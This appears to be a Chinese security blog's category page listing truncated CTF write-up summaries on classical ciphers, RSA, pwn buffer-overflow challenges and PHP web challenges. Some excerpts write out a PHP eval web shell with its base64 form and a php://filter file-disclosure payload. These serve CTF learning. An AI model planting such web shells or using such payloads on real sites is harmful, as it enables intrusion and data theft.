文章分类 - 安全
网络安全
摘要:题目: start.py import Test Dict = {} key = "A" value = 26 for i in range(1, 27): Dict.setdefault(key, value) print(Dict) key = chr(ord(key) + 1) value =
阅读全文
posted @ 2025-05-10 11:56
lethe311
摘要:题目: 公式: 开头为0,1,后面的每一项为前两项的和 思路: 根据斐波那契的值对应给的字符串的索引 s = "VERAYTRGUYTLOUYTFDRKONMLKJOPGF65DD" list = [0, 1] print(len(list)) flag = "" for i in range(le
阅读全文
posted @ 2025-05-10 10:22
lethe311
摘要:题目: 给你flag签个到好了 UGBRC{RI0G!O04_5C3_OVUI_DV_MNTB} 诶,我的flag怎么了???? 好像字母对不上了 我的签到怎么办呀,急急急 听说福来阁好像是TGCTF开头的喔 思路: s = "UGBRC{RI0G!O04_5C3_OVUI_DV_MNTB}" t
阅读全文
posted @ 2025-05-10 00:28
lethe311
摘要:题目: 得到的内容是小写字母,并32位小写MD5加密即可得到flag,记得套上flag{}。 思路: 观察发现存在金圣武士特征及Standard Galactic Alphabet 金圣武士 Standard Galactic Alphabet MIXCIPHER mixcipher flag{f3
阅读全文
posted @ 2025-05-09 22:18
lethe311
摘要:题目: 思路: 首先尝试2进制不行,培根不行,摩斯不行 了解了是dtmf2num 1*0000*00*000*001101*00*000*001101*11*111*010*000*0 - .... .. ... ..--.- .. ... ..--.- -- .-. ... . flag{this
阅读全文
posted @ 2025-05-09 22:01
lethe311
摘要:思路: 使用rsa解密c得到m,发现每个m都在1到26之间,考虑对应字母表的字母 script: from sympy import factorint from Crypto.Util.number import * import string char = string.ascii_lowerc
阅读全文
posted @ 2025-05-09 18:50
lethe311
摘要:题目: 21 31 41 53 63 73 62 72 82 81 91 01 51 61 71 九键应该没有01 考虑26键 wer bnm hjk iop tyu 观察行和列,发现中间的列是enjoy, MD5 flag{76e369257240ded4b1c059cf20e8d9a4}
阅读全文
posted @ 2025-05-09 17:55
lethe311
摘要:int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); setvbuf(stderr, 0, 2, 0); puts("
阅读全文
posted @ 2025-05-09 17:07
lethe311
摘要:题目: int vuln() { int buf[11]; // [esp+8h] [ebp-30h] BYREF memset(buf, 0, 40); read(0, buf, 0x38u); printf("%s", (const char *)buf); read(0, buf, 0x38u
阅读全文
posted @ 2025-05-09 13:07
lethe311
摘要:题目: int __fastcall main(int argc, const char **argv, const char **envp) { char s[24]; // [rsp+10h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp+28h] [
阅读全文
posted @ 2025-05-09 10:08
lethe311
摘要:题目: int __fastcall main(int argc, const char **argv, const char **envp) { char buf[32]; // [rsp+0h] [rbp-50h] BYREF __int64 s2[6]; // [rsp+20h] [rbp-3
阅读全文
posted @ 2025-05-08 22:15
lethe311
摘要:题目: __int64 game() { char buf[64]; // [rsp+0h] [rbp-40h] BYREF puts("Creeper?"); read(0, buf, 0x100uLL); if ( strlen(buf) == 15 ) { puts("Aw man"); sy
阅读全文
posted @ 2025-05-08 21:36
lethe311
摘要:题目: __int64 box() { char buf[40]; // [rsp+0h] [rbp-30h] BYREF unsigned __int64 v2; // [rsp+28h] [rbp-8h] v2 = __readfsqword(0x28u); puts("Please input
阅读全文
posted @ 2025-05-08 21:08
lethe311
摘要:得到nizhenbuhuiyiweizheshiqiandaoba 解压flag.zip 因为拼图要修改像素大小一致,所以改成40*40 import os from PIL import Image, ImageOps from collections import defaultdict fro
阅读全文
posted @ 2025-05-08 19:34
lethe311
摘要:题目: <?php show_source(__FILE__); @session_start(); ini_set('open_basedir', '/var/www/html/:/tmp/'); $sys = @$_SESSION['xxs']; if (isset($_GET['xxs']))
阅读全文
posted @ 2025-05-08 11:41
lethe311
摘要:题目: <?php /* https://ytyyds.github.io/ (与本题无关) */ error_reporting(0); highlight_file(__FILE__); function filter($string){ return preg_replace( '/phtml
阅读全文
posted @ 2025-05-08 11:13
lethe311
摘要:在某次渗透测试中,红队使用网站目录探测工具发现网站源码泄漏,该文件名疑似名被加密:aW5kZXgucGhwcw。 index.phps <?php if("xxs" $_GET[sys]) { echo("<p>Not a good idea!</p>"); exit(); } $_GET[sys]
阅读全文
posted @ 2025-05-08 10:50
lethe311
摘要:题目: <?php include "flag.php"; class Index{ private $Polar1; private $Polar2; protected $Night; protected $Light; function getflag($flag){ $Polar2 = ra
阅读全文
posted @ 2025-05-08 10:37
lethe311
摘要:将<?php @eval($_POST["123"]);phpinfo();?>编码PD9waHAgQGV2YWwoJF9QT1NUWyIxMjMiXSk7cGhwaW5mbygpOz8+ 使用http://a5134550-70e5-49d6-833a-d7f5e99ffe75.www.polar
阅读全文
posted @ 2025-05-08 10:20
lethe311
摘要:泄露upload.php ?filename=php://filter/convert.base64-encode/resource=/var/www/uploads/upload.php PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4
阅读全文
posted @ 2025-05-08 00:21
lethe311